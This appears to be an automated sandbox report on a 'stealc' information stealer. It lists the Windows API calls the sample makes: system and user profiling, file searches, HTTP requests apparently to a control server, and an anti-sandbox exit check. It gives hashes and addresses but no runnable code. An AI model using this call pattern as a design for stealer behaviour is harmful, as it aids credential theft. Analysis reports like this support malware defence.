                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                            • String ID: Uax
                                                                                                                                                                            • API String ID: 2104210347-3071186593
                                                                                                                                                                            • Opcode ID: efef00cb4f3d71e630850b57f8aad7d7b59013d6a4789015f5b61d61d4e7565e
                                                                                                                                                                            • Instruction ID: 2e2e6a990b07a191e9e8feccf0dd97381126901c30582d41e0ccd20d1a174338
                                                                                                                                                                            • Opcode Fuzzy Hash: efef00cb4f3d71e630850b57f8aad7d7b59013d6a4789015f5b61d61d4e7565e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D41E7B7514104ABCB94FBA4EC46EFE337DA788700F408648B54957186FD796B888BE3
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 00776280: InternetOpenA.WININET(00790DFE,00000001,00000000,00000000,00000000), ref: 007762E1
                                                                                                                                                                              • Part of subcall function 00776280: StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776303
                                                                                                                                                                              • Part of subcall function 00776280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00776335
                                                                                                                                                                              • Part of subcall function 00776280: HttpOpenRequestA.WININET(00000000,GET,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00776385
                                                                                                                                                                              • Part of subcall function 00776280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007763BF
                                                                                                                                                                              • Part of subcall function 00776280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007763D1
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785228
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                                                                            • API String ID: 3287882509-2579291623
                                                                                                                                                                            • Opcode ID: e47b0f1e13bc9eb03d4b775e7e15df09b8c65eae1aeb169e17d96706ac4adbd5
                                                                                                                                                                            • Instruction ID: 15cd268c48a475c492e4a33e5c2a793261e6ff643f998851ee801440648a35cb
                                                                                                                                                                            • Opcode Fuzzy Hash: e47b0f1e13bc9eb03d4b775e7e15df09b8c65eae1aeb169e17d96706ac4adbd5
                                                                                                                                                                            • Instruction Fuzzy Hash: B0112170950008F7DB18FF64DD9AAED7378AF50340F808165F81A46592EF3C6B15C792
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0078508A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFCC0), ref: 007850A8
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
                                                                                                                                                                              • Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                            • String ID: ax
                                                                                                                                                                            • API String ID: 2699682494-3322492788
                                                                                                                                                                            • Opcode ID: c5e9ca060581b507203af31c0721170d4caec3914e381843bcf241c46e5eef2d
                                                                                                                                                                            • Instruction ID: 54aa8dfa58346b25cc5b8aa73a615f538e34f4b64bb22a986531a92ede1db629
                                                                                                                                                                            • Opcode Fuzzy Hash: c5e9ca060581b507203af31c0721170d4caec3914e381843bcf241c46e5eef2d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5901D676954208A7CB54FB70DC4AEEE337CAB54300F404284F64952181EE78AAC88BE3
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4203777966-0
                                                                                                                                                                            • Opcode ID: 19d5f9ff2aeff3733a07d2eac2a21f58080fdee84eb3cc48b44f2393aec9dc7a
                                                                                                                                                                            • Instruction ID: 6de3c31e37389cea4335a144a04d114325fb1cc662ac37c0905d63ef4fc0cffc
                                                                                                                                                                            • Opcode Fuzzy Hash: 19d5f9ff2aeff3733a07d2eac2a21f58080fdee84eb3cc48b44f2393aec9dc7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A0186B1958204EFC714DF95DD45BAABBB8F704B21F104219F545E3680D3785940CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00789484
                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007894A5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 007894AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                                                            • Opcode ID: 86a0a554beb72a1eda8128286f7bc45a4d2e7011aad00bf6b789fd98763c64d6
                                                                                                                                                                            • Instruction ID: 0ac27e5cddd900ea70cde116b98b476b6d33b44d668382d444c1d86b79b81255
                                                                                                                                                                            • Opcode Fuzzy Hash: 86a0a554beb72a1eda8128286f7bc45a4d2e7011aad00bf6b789fd98763c64d6
                                                                                                                                                                            • Instruction Fuzzy Hash: B3F05E7494420CFBDB04EFA4DD4AFEE7778EB08310F004598BB0997290D6B4AE85DB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00786A1C), ref: 0077112B
                                                                                                                                                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00786A1C), ref: 00771132
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00771143
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1103761159-0
                                                                                                                                                                            • Opcode ID: c590a29016fce6687857455c5b6609c7db83ba83f5a591fd7f3fd24a79160cac
                                                                                                                                                                            • Instruction ID: 6e3f7287121355e486c69055082f519e0d13b8309f3126f6fd9faaa368cf191d
                                                                                                                                                                            • Opcode Fuzzy Hash: c590a29016fce6687857455c5b6609c7db83ba83f5a591fd7f3fd24a79160cac
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0867095930CFBEB106BA4DD0EB087678AB04B51F504154F7087A5C0D6B52600A799
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 00787500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00787542
                                                                                                                                                                              • Part of subcall function 00787500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0078757F
                                                                                                                                                                              • Part of subcall function 00787500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787603
                                                                                                                                                                              • Part of subcall function 00787500: HeapAlloc.KERNEL32(00000000), ref: 0078760A
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 00787690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007876A4
                                                                                                                                                                              • Part of subcall function 00787690: HeapAlloc.KERNEL32(00000000), ref: 007876AB
                                                                                                                                                                              • Part of subcall function 007877C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0078DBC0,000000FF,?,00781C99,00000000,?,00D00300,00000000,?), ref: 007877F2
                                                                                                                                                                              • Part of subcall function 007877C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0078DBC0,000000FF,?,00781C99,00000000,?,00D00300,00000000,?), ref: 007877F9
                                                                                                                                                                              • Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
                                                                                                                                                                              • Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
                                                                                                                                                                              • Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F
                                                                                                                                                                              • Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
                                                                                                                                                                              • Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
                                                                                                                                                                              • Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F
                                                                                                                                                                              • Part of subcall function 00787980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00790E00,00000000,?), ref: 007879B0
                                                                                                                                                                              • Part of subcall function 00787980: HeapAlloc.KERNEL32(00000000,?,?,?,?,00790E00,00000000,?), ref: 007879B7
                                                                                                                                                                              • Part of subcall function 00787980: GetLocalTime.KERNEL32(?,?,?,?,?,00790E00,00000000,?), ref: 007879C4
                                                                                                                                                                              • Part of subcall function 00787980: wsprintfA.USER32 ref: 007879F3
                                                                                                                                                                              • Part of subcall function 00787A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787A63
                                                                                                                                                                              • Part of subcall function 00787A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A6A
                                                                                                                                                                              • Part of subcall function 00787A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A7D
                                                                                                                                                                              • Part of subcall function 00787B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787B35
                                                                                                                                                                              • Part of subcall function 00787B90: GetKeyboardLayoutList.USER32(00000000,00000000,007905AF), ref: 00787BE1
                                                                                                                                                                              • Part of subcall function 00787B90: LocalAlloc.KERNEL32(00000040,?), ref: 00787BF9
                                                                                                                                                                              • Part of subcall function 00787B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00787C0D
                                                                                                                                                                              • Part of subcall function 00787B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00787C62
                                                                                                                                                                              • Part of subcall function 00787B90: LocalFree.KERNEL32(00000000), ref: 00787D22
                                                                                                                                                                              • Part of subcall function 00787D80: GetSystemPowerStatus.KERNEL32(?), ref: 00787DAD
